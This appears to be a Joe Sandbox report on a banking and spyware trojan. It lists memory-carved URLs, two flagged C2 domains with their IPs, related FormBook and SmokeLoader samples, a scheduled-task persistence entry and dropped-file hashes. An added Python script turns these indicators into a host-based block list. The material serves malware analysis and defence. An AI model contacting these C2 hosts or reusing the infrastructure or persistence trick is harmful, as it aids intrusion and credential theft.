http://quantumqube.org/index.phpMozilla/5.0 | explorer.exe, 00000007.00000002.2375965405.0000000003298000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2347347955.0000000000A79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3927428692.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3928236257.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3928453017.0000000003297000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3926853756.0000000000859000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3928965249.00000000033D0000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://quantumqube.org:80/index.phpcrosoft | explorer.exe, 00000007.00000002.2375965405.00000000032E2000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://android.notify.windows.com/iOS | explorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://word.office.com48 | explorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp | explorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://lodash.com/license | explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.dr | false | URL Reputation: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://api.msn.com/ | explorer.exe, 00000002.00000000.1474139705.000000000702D000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.dr | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com:443/en-us/feed | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
https://www.msn.com/en-us/weather/topstories/accuweather-el-ni | explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | false |  | unknown
http://quantumqube.org/index.phpn | explorer.exe, 00000007.00000002.2375965405.0000000003298000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
Map legend (No. of IPs per country): < 25%, 25%-50%, 50%-75%, > 75%
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
194.87.189.87 | quantumqube.org | Russian Federation |  | 197695 | AS-REGRU | true
198.54.117.242 | innovixus.org | United States |  | 22612 | NAMECHEAP-NETUS | true
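The contacted-domain, contacted-IP and memory-carved URL tables above are the raw material for a block list, but several of the carved strings carry bytes fused onto the end of the URL (a user-agent string, a content type, a dropped or extra character, an explicit port), so matching on the full string would miss them. The following Python script is an added example, not code from the Joe Sandbox report or its tooling: it parses each carved string with urllib.parse and matches on the hostname only, so those trailing bytes cannot break the match, and it records whether the path still begins with the /index.php C2 path the report lists. The malicious domains and their IPs are copied from the tables above; SAMPLE_URLS is a constructed subset of the report's carved URL rows; the function and type names are the example's own.

```python
"""Host-based IOC triage for URL strings carved from process memory.

Added example, not code from the Joe Sandbox report. MALICIOUS_DOMAINS is
copied from the report's contacted-domain and contacted-IP tables; SAMPLE_URLS
is a constructed subset of the report's "URLs from memory" rows, chosen to
include the fused, truncated and port-bearing variants.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Copied from the report: domains flagged malicious and the IPs they resolved to.
MALICIOUS_DOMAINS: Dict[str, str] = {
    "quantumqube.org": "194.87.189.87",
    "innovixus.org": "198.54.117.242",
}

# C2 path from the report's contacted-URL table.
C2_PATH = "/index.php"

# Constructed sample input: carved strings as they appear in the report.
SAMPLE_URLS: List[str] = [
    "http://quantumqube.org/index.phpMozilla/5.0",           # user-agent fused on
    "http://quantumqube.org/application/x-www-form-urlencodedMozilla/5.0",
    "http://quantumqube.org/ndex.php",                        # leading byte of path lost
    "http://quantumqube.org:80/index.phpcrosoft",             # explicit port, junk suffix
    "https://innovixus.org/index.php",                        # clean second C2
    "https://duckduckgo.com/ac/?q=",                          # benign browser string
    "http://schemas.micro",                                   # truncated, benign
]


@dataclass(frozen=True)
class Indicator:
    raw: str                   # string exactly as carved from memory
    host: str                  # lower-cased hostname, port stripped
    port: Optional[int]        # explicit port if the carved string had one
    path: str                  # path as carved; may carry trailing junk
    c2: bool                   # host is one of the report's malicious domains
    c2_path: bool              # path starts with the known C2 path
    resolved_ip: Optional[str]


def classify(raw: str) -> Indicator:
    """Classify one carved string by its parsed host.

    urlsplit() ends the host at the first '/' or ':', so bytes fused after the
    path (e.g. 'Mozilla/5.0') never reach the comparison. The port is read
    defensively because carved data can leave non-numeric junk after ':'.
    """
    parts = urlsplit(raw.strip())
    host = (parts.hostname or "").lower()
    try:
        port = parts.port
    except ValueError:  # e.g. 'host:abc' carved from memory
        port = None
    return Indicator(
        raw=raw,
        host=host,
        port=port,
        path=parts.path,
        c2=host in MALICIOUS_DOMAINS,
        c2_path=parts.path.startswith(C2_PATH),
        resolved_ip=MALICIOUS_DOMAINS.get(host),
    )


def triage(urls: List[str]) -> List[Indicator]:
    return [classify(u) for u in urls]


def c2_hosts(urls: List[str]) -> List[str]:
    """Distinct malicious hosts seen in the carved strings, sorted."""
    return sorted({i.host for i in triage(urls) if i.c2})


def block_list(urls: List[str]) -> Dict[str, str]:
    """host -> resolved IP for every C2 host seen: the two keys to block and hunt on."""
    return {i.host: i.resolved_ip for i in triage(urls) if i.c2 and i.resolved_ip}


if __name__ == "__main__":
    for ind in triage(SAMPLE_URLS):
        tag = "C2" if ind.c2 else "--"
        print(f"{tag} {ind.host:<22} path={ind.path!r} ip={ind.resolved_ip}")
    print("block:", block_list(SAMPLE_URLS))
```

Matching on the parsed host rather than the raw string is the point: of the seven sample strings, five resolve to the two report-flagged domains even though only one of them is a clean, complete URL. Block and hunt on the host and IP pair; treat the path as corroboration only, since carved paths are not trustworthy.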
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1527171
Start date and time: 2024-10-06 21:25:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe
Detection: MAL
Classification: mal100.bank.troj.spyw.evad.winEXE@17/55@3/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 127
• Number of non-executed functions: 81
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe
Time | Type | Description
15:26:24 | API Interceptor | 256399x Sleep call for process: explorer.exe modified
21:26:31 | Task Scheduler | Run new task: Firefox Default Browser Agent 7B7BC59515542800 path: C:\Users\user\AppData\Roaming\hfetwhc
Match | Associated Sample Name / URL | Detection | Threat Name | Context
198.54.117.242 | Kommerzielle Bestellung.pdf (2).exe | malicious | FormBook | www.golightresins.com/rn10/?DZZt=ochA0/+yD4T15LB3F5IXRtocyLTBiYmHj9IF8eWMKtE0E3XIuoy55xiykob9EQJmXVr3&vL08lV=dn3xFJ3xMHCx
 | LSW51096D32024I.exe | malicious | FormBook | www.tateshades.xyz/de94/?r49DK2LP=KxdOA0Mo1WZhrruLdWg4BGjiUazPRKkva+c6BVUkR9pg9lvbFJGOvuIlGoK6VQZT108t&CR-=Cr-TxJ
 | TNS71092E68UI0.vbe | malicious | FormBook | www.tateshades.xyz/de94/?iH=L48pdJnx&jBZ=KxdOA0Mo1WZhrruLdWg4BGjiUazPRKkva+c6BVUkR9pg9lvbFJGOvuIlGrqlewJrvTBn
 | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | www.usebanq.com/azio/
 | hdBLUdo056.exe | malicious | FormBook | www.usebanq.com/8lx9/
 | fiY5fTkFKk.rtf | malicious | FormBook | www.usebanq.com/8lx9/
 | tEBdYCAxQC.rtf | malicious | FormBook | www.usebanq.com/8lx9/
 | PIG860624BF1GE1532.xml.exe | malicious | FormBook | www.cbsnews23.store/q696/
 | 12nTpM7hB1.exe | malicious | FormBook, PureLog Stealer | www.cbsnews23.store/q696/
 | OSL332C-HBLx#U180es#U180el#U180ex#U180e..exe | malicious | FormBook | www.cbsnews23.store/q696/
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-REGRU | -pdf.bat.exe | malicious | FormBook | 194.58.112.174
 | hH4dbIGfGT.exe | malicious | FormBook | 194.58.112.174
 | Fvqw64NU4k.exe | malicious | FormBook | 194.58.112.174
 | z4Shipping_document_pdf.exe | malicious | FormBook | 31.31.196.17
 | update SOA.exe | malicious | FormBook | 31.31.196.17
 | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz | 194.58.114.223
 | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz | 194.58.114.223
 | file.exe | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | 37.140.192.213
 | RTGS-WB-ABS-240730-NEW.lnk | malicious | AgentTesla | 176.99.3.36
 | PO For Bulk Order.exe | malicious | FormBook | 31.31.196.17
NAMECHEAP-NETUS | http://nirothniroth.site/?p=22&fbclid=IwY2xjawFs_DdleHRuA2FlbQIxMQABHTdgZU6ok722L5RxKPR-zh7Gkm6BqZ8BcT950y1bxf6l0LKz0zslg7KJHw_aem__ldVm1UUndXAkwYRakjBzg | malicious | Unknown | 63.250.43.7
 | http://reportrix.co.uk/assets/assetfile/js/main.js | malicious | Unknown | 104.219.248.24
 | presupuesto urgente.exe | malicious | FormBook, GuLoader | 199.192.19.19
 | 1.cmd | malicious | Unknown | 192.64.119.55
 | -pdf.bat.exe | malicious | FormBook | 162.213.249.216
 | 1.cmd | malicious | Unknown | 192.64.119.55
 | 1.cmd | malicious | Quasar | 192.64.119.55
 | https://livelovelead.coach/wp-admin/readme.html | malicious | Phisher | 162.0.235.3
 | hH4dbIGfGT.exe | malicious | FormBook | 162.0.236.169
 | DHL_ 46773482.exe | malicious | FormBook | 162.0.238.246
No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dll | SecuriteInfo.com.Trojan.GenericKD.70788680.21050.25766.exe | malicious | SmokeLoader
 | SecuriteInfo.com.BScope.TrojanPSW.RedLine.20889.11478.exe | malicious | SmokeLoader
C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dll | SecuriteInfo.com.Trojan.GenericKD.70788680.21050.25766.exe | malicious | SmokeLoader
 | SecuriteInfo.com.BScope.TrojanPSW.RedLine.20889.11478.exe | malicious | SmokeLoader
C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletProxy.dll | SecuriteInfo.com.Trojan.GenericKD.70788680.21050.25766.exe | malicious | SmokeLoader
 | SecuriteInfo.com.BScope.TrojanPSW.RedLine.20889.11478.exe | malicious | SmokeLoader

Process: C:\Windows\SysWOW64\explorer.exe
File Type: SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 98304
Entropy (8bit): 0.08235737944063153
Encrypted: false
SSDEEP: 12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5: 369B6DD66F1CAD49D0952C40FEB9AD41
SHA1: D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256: 14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512: 771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious: false
Reputation: high, very likely benign file

Process: C:\Windows\SysWOW64\explorer.exe
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.017262956703125623
Encrypted: false
SSDEEP: 3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5: B7C14EC6110FA820CA6B65F5AEC85911
SHA1: 608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256: FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512: D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious: false

Process: C:\Windows\SysWOW64\explorer.exe
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.017262956703125623
Encrypted: false
SSDEEP: 3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5: B7C14EC6110FA820CA6B65F5AEC85911
SHA1: 608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256: FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512: D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious: false

Process: C:\Windows\SysWOW64\explorer.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.8553638852307782
Encrypted: false
SSDEEP: 48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5: 28222628A3465C5F0D4B28F70F97F482
SHA1: 1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256: 93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512: C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious: false

Process:C:\Windows\SysWOW64\explorer.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:dropped
Size (bytes):20480
Entropy (8bit):0.8475592208333753
Encrypted:false
SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:BE99679A2B018331EACD3A1B680E3757
SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:false

Process:C:\Windows\SysWOW64\explorer.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1373607036346451
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:64BCCF32ED2142E76D142DF7AAC75730
SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:false

Process:C:\Windows\SysWOW64\explorer.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):51200
Entropy (8bit):0.8746135976761988
Encrypted:false
SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:9E68EA772705B5EC0C83C2A97BB26324
SHA1:243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:false

Process:C:\Windows\SysWOW64\explorer.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:dropped
Size (bytes):20480
Entropy (8bit):0.6732424250451717
Encrypted:false
SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:false

Process:C:\Windows\SysWOW64\explorer.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:dropped
Size (bytes):196608
Entropy (8bit):1.1209886597424439
Encrypted:false
SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:false

Process:C:\Windows\SysWOW64\explorer.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
Category:dropped
Size (bytes):4617240
Entropy (8bit):7.998473034600968
Encrypted:true
SSDEEP:98304:zgETyEfTDRhXxx1nCbxWOYGC6bGrDUK3YBNltU7G2l3TJNnQC1:/fTDXxx2B0UK97JtNnj
MD5:721A567C2E0250F6216B839C7313AA6C
SHA1:7EF9527C7F1395F0A2C9EC67B3BA2DB8ECC0C332
SHA-256:32A6ABD65A8EFAF6B9C1B475C8A7F0AE5049A2328842B89BF886E108E8BB144F
SHA-512:7A65865B34307823081EF2563B792F2831BD7BA27D5676F69605F66F164429C2760596DB779990CF52DD4D916AB5DB72C99A8E0710C9DB56AF0A80F34CDE5E9A
Malicious:false

Process:C:\Windows\SysWOW64\explorer.exe
File Type:HTML document, ASCII text, with very long lines (506)
Category:dropped
Size (bytes):1558
Entropy (8bit):5.271192944455372
Encrypted:false
SSDEEP:24:0c1HjWxXqxVWtXqxVg+vIuB0JDPPM2zWCPFwKhqFTA7v0KNA5qFNq6W4qA7BfnR8:0+Hq5qJYDPPZPF/Y6bDXqAtfhhH94Yhu
MD5:5CA69BAAF837E965239677997944A95F
SHA1:C17D7BE904F349E903DE787D4837724DD3FFB705
SHA-256:96591346DA6F8CBA32C10B2FFA6F5F3851B696EFDC800767A51CAF882523A177
SHA-512:C9549A4062FD3144D5EC91BACC95901DE944135484ABE15F6AB773050CD279656D9E53F47B7466EE09822D11AC1F4C3356A7B0DC311531359354355FFA95B42A
Malicious:false
Preview:<!doctype html><html dir="$i18n{textdirection}" lang="$i18n{language}"><head><meta charset="utf-8"><meta version="39855961/20314 - 2023-09-29T14:48:20.320Z"><title>Mini Wallet</title><script defer="defer" src="/base-error-reporting.js"></script><script defer="defer" src="/wallet-error-reporting.js"></script><script src="chrome://resources/js/load_time_data.m.js" type="module"></script><script src="/strings.m.js" type="module"></script><style>/* Copyright (C) Microsoft Corporation. All rights reserved.. * Use of this source code is governed by a BSD-style license that can be. * found in the LICENSE file. */..body {. font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;. font-size: 14px;. background-color: rgb(247, 247, 247);. margin: 0;.}..@media (forced-colors:none) {. input::selection {. color: #FFF;. background: #0078D4;. }.}..@media (prefers-color-scheme: dark) {. body {. background-c

Process:C:\Windows\SysWOW64\explorer.exe
File Type:ASCII text, with very long lines (65461)
Category:dropped
Size (bytes):362915
Entropy (8bit):5.641237841074662
Encrypted:false
SSDEEP:6144:2lucRdGqvLVgb+AEWKLeUFMrY3MWf9FE5PdwGvPJvUcr2GLA:lqveSryIMrY3M49OZqcrVs
MD5:B717DBE5C65A167F15592CF7B5D69C40
SHA1:12E83938CD956A85F0E801954019F5813E13C139
SHA-256:36BD69A27956283AC59CEC3A9C6B843A6EC426FC9C4BFEB2BE849E46DECE2F29
SHA-512:1FFE0ABED1C1B5CDA4E087F681BCC47F06288D79FD593D5ADA5EC4378D17B87BCB03369298C79EA2C074C9D54C7AE1226F0BFFABE5F3D785518476B616006B1D
Malicious:false

Process:C:\Windows\SysWOW64\explorer.exe
File Type:ASCII text
Category:dropped
Size (bytes):295
Entropy (8bit):4.7070549789727645
Encrypted:false
SSDEEP:6:U03WiGjs/TdMK1OmFsZ1FD+Dm3Jue9DOFTTgGHYVov10:U3kTHwmiCD6JuoqIfov10
MD5:9FADCDA30B07120E2CB70B5A003ACFF9
SHA1:A4EB198C6AE011CFB495A25D7C04B62FDD1D0346
SHA-256:63EC623C2BDA74FC3E3D2796151FFE93255E8BD76B2D8BDFE2EA0B401848B15F
SHA-512:E34A8BCE98AC7EEEB3416A9D2E8F331181A25E06467AA211AF4A12A88CEF0C5B2678792D03378F888C212EFF6340647AC99F97AA2CADB75C3777527FDDF77552
Malicious:false
Preview:/*.object-assign.(c) Sindre Sorhus.@license MIT.*/../** @license React v16.14.0. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.

Process:C:\Windows\SysWOW64\explorer.exe
File Type:ASCII text, with very long lines (65458)
Category:dropped
Size (bytes):1394663
Entropy (8bit):5.568332601544202
Encrypted:false
SSDEEP:24576:X6cIyB2Fx2Mr+Y2mHDvpttZwJbhTJrSK4VPYOI+AmOkmMOkxhdlrw+QsjZIQi6SI:X6cIyB2Fx2MrPbDvpttZwJbhTJrSK4VJ
MD5:766E13C5EB1DC68F700EC491E912DF8A
SHA1:94103276DECE118BE7182D565FFDB64A60452364
SHA-256:223DCDC8779A51D6D07C349B7AA30B920D1C44834C17EA75E26C855A6FCECD3B
SHA-512:A48F08DFCC53BC953C8C7E35E7FA587AFC09C90E806F0049C0F6684C543006554EBDDF0F4CB329E89823309CE0D41F7C202D7B9D2FA7025BE8A98853DAB6BF9E
Malicious:false
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1794
                                                                                                                                    Entropy (8bit):4.843900190800991
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:B9iDk8YzW0Tk3NtkiYi7oVwuwBA4uoqIfy+wBA4uoqIfyCwBA4uoqIfyrwBA4uoT:GD6xTmtUWIAfyIAfEIAflIAff
                                                                                                                                    MD5:DF3D44AC0E39EB1CA9318D0F07F746E2
                                                                                                                                    SHA1:7F6B92AC0574C3287C16FC7B49B9E0356FA7882B
                                                                                                                                    SHA-256:BA149E358C97FFDF1CB5B9E26D6A9D0F3E19A7692F306B0C87118AEFECE40A21
                                                                                                                                    SHA-512:0C8AE3D4FEC2227464F0DF6D5667EA9E62FB20BA876C5B80ECFB5DB3E76AF42EA8B8F8C5AB5FC69C141E7E7E3D9840927A15C1FAB64613786C1F9D13B826730C
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:/*.object-assign.(c) Sindre Sorhus.@license MIT.*/../*!..Copyright (c) 2018 Jed Watson...Licensed under the MIT License (MIT), see..http://jedwatson.github.io/classnames.*/../*!. * Copyright (c) Microsoft Corporation. All rights reserved.. * Licensed under the MIT License.. */../**. * CSS Vendor prefix detection and property feature testing.. *. * @copyright Oleg Slobodskoi 2015. * @website https://github.com/jsstyles/css-vendor. * @license MIT. */../**. * @license. * Lodash <https://lodash.com/>. * Copyright OpenJS Foundation and other contributors <https://openjsf.org/>. * Released under MIT license <https://lodash.com/license>. * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>. * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors. */../** @license React v0.19.1. * scheduler.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICEN
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (589)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1878
                                                                                                                                    Entropy (8bit):5.224434099079608
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:0+KbicYkYDPPZPF/Y6bDXqAtfu2YvywpyNhiG5Biu:HJkYDHL/Y6bTqif/Y6bNhiNu
                                                                                                                                    MD5:BF04B54F7B88E9110E3C68B727C5BE0F
                                                                                                                                    SHA1:7669103AFC426A829A3BA405C5ADE227C1EB2319
                                                                                                                                    SHA-256:1F28EE5F31140BCB2B1F48C33D645E3B8D028D3C692B85893BB6E36A013E108E
                                                                                                                                    SHA-512:4DFFDEF0646382967E079A2A80EBEEF4B96992A99C488FC56ED5CA48D76971832F65BF72CEBCFB0CCF4B2CFCB67ECDD48CC55D7BAD42FB78314DAC1CED2CF3BC
                                                                                                                                    Malicious:false
